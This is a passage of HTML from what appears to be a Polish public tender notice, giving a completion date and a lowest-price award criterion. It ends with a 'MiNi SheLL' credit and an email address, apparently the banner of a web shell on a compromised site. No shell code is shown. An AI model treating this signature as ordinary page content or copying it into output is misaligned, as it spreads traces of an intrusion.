<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com